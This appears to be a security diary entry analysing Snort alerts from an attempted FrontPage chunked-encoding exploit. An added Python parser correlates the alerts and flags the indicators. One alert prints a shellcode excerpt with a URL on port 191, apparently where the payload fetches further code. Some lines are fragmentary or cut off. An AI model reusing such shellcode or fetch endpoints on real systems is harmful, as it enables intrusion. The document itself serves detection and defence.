An article on TMCNet's site indicates that phishers are attempting to exploit the worries of credit card holders following last week's announcement of a break-in that could have revealed up to 4 million credit card numbers. Pleasant.
indicate that only 13.9 CC numbers were MasterCard. Thanks Bao!
Unusual FrontPage Hack
Ryan Barnett (CIS Apache Benchmark Project Lead) writes in with some Snort logs indicating an attempted FrontPage hack on a system he is monitoring. The first entry indicates an attempt to exploit the chunked-encoding transfer bug:
[**] WEB-MISC Chunked-Encoding transfer attempt [**]
06/20-23:46:58.486734 66.161.76.150:39942 -> 192.168.1.100:80
TCP TTL:61 TOS:0x0 ID:18331 IpLen:20 DgmLen:161 DF
***AP*** Seq: 0x5C80E4DE Ack: 0xC919E70B Win: 0xC1E8 TcpLen: 20
POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1..Host: 192.168.1.100
..Transfer-Encoding: chunked..Content-Length: 1499....
This is a routine scan that I'm sure many readers are familiar with. The unusual bit is the x86 NOOP alert that followed:
[**] SHELLCODE x86 NOOP [**]
06/20-23:46:58.489143 66.161.76.150:39942 -> 192.168.1.100:80
TCP TTL:61 TOS:0x0 ID:18332 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x5C80E557 Ack: 0xC919E70B Win: 0xC1E8 TcpLen: 20
5db.........................g...................................
................................................................
................................................................
................................................................
................g...............................................
......Ehttp://10.10.2.2:191/lsd.080/lsd..b.]3.f....u.....<.u.F..
,0F4...G..............q................rh.B.f..............q....
This output has been trimmed for space. Ryan indicates that there is no internal host at 10.10.2.2 listening on port 191. If there are any other readers with similar log entries matching port 191 or the /lsd.* URL, please
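As an added example (not part of the diary or of Ryan's logs), here is a small Python parser for Snort full-format alerts like the two above: it groups alerts by TCP connection, pulls URL-looking strings out of the payload dump, and checks them against the port 191 / /lsd.* indicators Ryan asked readers to look for. The sample alert text is constructed from the trimmed entries above.

```python
import re
from urllib.parse import urlsplit

# Constructed sample in Snort "full" alert format, trimmed from the entries above.
SAMPLE_ALERTS = """\
[**] WEB-MISC Chunked-Encoding transfer attempt [**]
06/20-23:46:58.486734 66.161.76.150:39942 -> 192.168.1.100:80
TCP TTL:61 TOS:0x0 ID:18331 IpLen:20 DgmLen:161 DF
***AP*** Seq: 0x5C80E4DE Ack: 0xC919E70B Win: 0xC1E8 TcpLen: 20
POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1..Transfer-Encoding: chunked..

[**] SHELLCODE x86 NOOP [**]
06/20-23:46:58.489143 66.161.76.150:39942 -> 192.168.1.100:80
TCP TTL:61 TOS:0x0 ID:18332 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x5C80E557 Ack: 0xC919E70B Win: 0xC1E8 TcpLen: 20
......Ehttp://10.10.2.2:191/lsd.080/lsd..b.]3.f....u.....<.u.F..
"""

HEADER_RE = re.compile(r"^\[\*\*\] (?P<msg>.+?) \[\*\*\]$")
FLOW_RE = re.compile(r"^(?P<ts>\S+) (?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$")
# Snort prints non-printable bytes as '.', so a URL in the dump ends at the first '..' run;
# host and path segments are therefore written so that they never contain '..'.
URL_RE = re.compile(r"https?://[\w\-]+(?:\.[\w\-]+)*(?::\d+)?(?:/[\w\-]+(?:\.[\w\-]+)*)*")

def parse_alerts(text):
    # Each blank-line separated block: alert header, flow line, IP line, TCP line, payload dump.
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = block.splitlines()
        flow = FLOW_RE.match(lines[1]) if len(lines) > 4 else None  # need header..payload
        head = HEADER_RE.match(lines[0])
        if head and flow:
            records.append({"msg": head["msg"], **flow.groupdict(), "payload": "".join(lines[4:])})
    return records

def correlate(records):
    # Group by socket pair so the chunked POST and the NOOP sled that followed it on the
    # same connection are reported as one event, with any URLs found in the dumps.
    sessions = {}
    for r in records:
        key = (r["src"], r["sport"], r["dst"], r["dport"])
        s = sessions.setdefault(key, {"alerts": [], "urls": []})
        s["alerts"].append(r["msg"])
        s["urls"].extend(URL_RE.findall(r["payload"]))
    return sessions

def matches_watch(url, port=191, path_prefix="/lsd"):
    # The indicators from the diary: a fetch from port 191 or an /lsd.* path.
    parts = urlsplit(url)
    return parts.port == port or parts.path.startswith(path_prefix)
```

Point it at a real Snort alert file and any session whose extracted URLs satisfy matches_watch() is one worth sending in.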